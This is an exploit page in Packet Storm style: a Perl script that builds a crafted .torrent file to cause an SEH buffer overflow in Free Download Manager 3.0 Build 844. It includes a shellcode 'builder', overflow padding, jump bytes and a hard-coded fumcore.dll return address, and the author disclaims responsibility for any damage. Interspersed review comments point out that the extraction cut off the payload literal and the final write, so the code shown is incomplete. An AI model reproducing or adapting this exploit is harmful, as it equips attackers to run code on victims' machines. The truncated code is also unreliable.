Free Download Manager 3.0 Buffer Overflow

Type packetstorm
Reporter SkD
Modified 2009-02-03T00:00:00


# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit  
# -----------------------------------------------------------  
# Exploit by SkD (  
# Vendor's URL =  
# []  
# Download FDM 3.0 Build 844 =  
# []  
# (Downloaded by over 1.6 million users!)  
# This is another one of the more advanced exploitation methods  
# for buffer overflows using my method called "shell building".  
# It utilizes a SEH overflow and then a shellcode builder/assembler  
# "builds"/or "assembles" bytes that were deleted by transformation  
# of the buffer so that the shellcode will work without a flaw.  
# I have been able to do this because of my recent experiences with  
# UNICODE based overflows (heap & stack). This is a demonstration  
# of how you can obtain power with limitations to buffer.  
# Of course I could have used my shellhunting technique,  
# but this is a new method, and to demonstrate it in a world of  
# dying buffer overflows is important for me.  
# Unfortunately I did not have time to make this a universal exploit  
# so it only works on NT-based systems EXCEPT Vista (due to randomized  
# heap, etc). But with a few modifications it can work (sure of it).  
# Read my notes & comments in the script for more info.  
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.  
# Note: Author has no responsibility over the damage you do with this!  
# Script body as reproduced on this page. Several statements are cut off by
# the page's extraction (lines ending in a bare "." with no continuation), so
# the payload literal, the rest of the torrent data and the final print
# argument are not visible in this copy; comments below describe only what
# survives.
use strict;  
use warnings;  
# Bencoded torrent prefix: these escapes decode to the ASCII text
# "d8:announce12:AAAAAAAAAAAA7:com" (dictionary, an "announce" key with a
# 12-byte value, then the start of a 7-byte key). The remainder of the
# literal is missing from this copy.
my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".  
# Decodes to "12:piece lengthi262144e6:pieces"; the value that should follow
# "6:pieces" is likewise cut off here. NOTE(review): the title and the size
# constants further down suggest the oversized field is the one after
# "pieces" -- bounding that declared length before copying it is the
# parser-side fix -- but the print statement that would confirm the layout
# is truncated, so treat this as unconfirmed.
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".  
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum  
# NOTE(review): the payload literal itself is absent from this copy; the line
# above is only the generator's description of it (a calc.exe launcher).
# As the text stands, "my $shellcode =" runs straight into the next "my", so
# Perl would assign the builder to both variables -- another sign that the
# literal was dropped during extraction rather than omitted by the author.
my $shellcode =  
#Notice I added 0x01 byte before each 0x80=> byte.  
#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does  
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).  
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add  
#0x01 before each 0x80=> byte.  
# Every byte in the six concatenated groups below is in the range 0x01-0x5B,
# i.e. all below 0x80, consistent with the author's note that the target
# transformation removes bytes >= 0x80.
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).  
("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).  
("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).  
("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");  
# The two length($shellcode_builder) terms cancel, so this is simply
# 12999 - (10362 + length($shellcode)): the 10000-byte and 350-byte fillers
# plus 12 bytes (the three 4-byte values declared below) are fixed, and only
# the payload size varies. length($shellcode) cannot be evaluated from this
# truncated copy.
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).  
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.  
# Filler: a fixed 10000-byte block plus a variable block sized by $len.
my $overflow1 = "\x41" x 10000;  
my $overflow2 = "\x41" x $len;  
# Pads the builder up to a fixed 350 bytes.
my $sled = "\x41" x (350 - length($shellcode_builder));  
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)  
# Hard-coded address inside one specific build of the named DLL; presumably
# this is why the header restricts the script to the listed Windows versions.
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)  
# NOTE(review): two-argument open with no return-value check. If the open
# fails the script continues; under "use warnings" the print below then only
# warns about the closed handle instead of dying. Output goes to s.torrent in
# the current directory.
open(my $torrent, "> s.torrent");  
# Cut off in this copy: only the first operand of the concatenation survives,
# so the order in which the pieces above are written is not recoverable here.
print $torrent $tdata1.  
close $torrent;